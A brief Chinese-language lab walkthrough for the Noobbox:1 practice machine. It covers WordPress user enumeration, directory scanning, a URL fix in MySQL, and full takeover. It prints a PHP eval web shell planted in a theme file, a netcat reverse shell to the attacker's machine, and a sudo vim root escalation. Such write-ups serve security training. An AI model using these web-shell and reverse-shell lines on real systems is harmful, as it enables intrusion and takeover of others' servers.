Noobbox:1
靶场错误:路由跳转到192.168.43.162(wrodpress配置的网站路由),要修改为dhcp获取的ip地址。
| 账户 | noobbox | wpscan枚举用户名获得 |
|---|---|---|
| 密码 | 5p4c3 | 目录扫描出img.jpg获得 |
且系统用户,wordpress后台,mysql数据库使用相同的账号密码
访问登录发现跳转到192.168.43.162
因为vbox上查看无法翻页,所有我nc反弹shell,vim提权后,连接mysql,修改option_value
连接mysql -u noobbox -p 5p4c3
option_id | option_name | option_value | autoload |
1 | siteurl | http://192.168.43.162/wordpress | yes |
2 | home | http://192.168.43.162/wordpress | yes |
修复:
UPDATE wp_options SET option_value = 'http://192.168.3.48/wordpress' WHERE option_name = 'siteurl';
UPDATE wp_options SET option_value = 'http://192.168.3.48/wordpress' WHERE option_name = 'home';
然后就可以正常访问登录了。
修改模板插入一句话,反弹shell,提权到noobbox,sudo vim提权到root。
wpscan --url http://192.168.3.48/wordpress --enumerate u --force
gobuster dir \
-u http://192.168.3.48/ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x jpg
nc -e /bin/sh 192.168.3.33 4444
nc -lnvp 4444
<?php @eval($_POST['cmd']); ?>
http://192.168.3.48/wordpress/wp-content/themes/twentytwentyone/index.php
浙公网安备 33010602011771号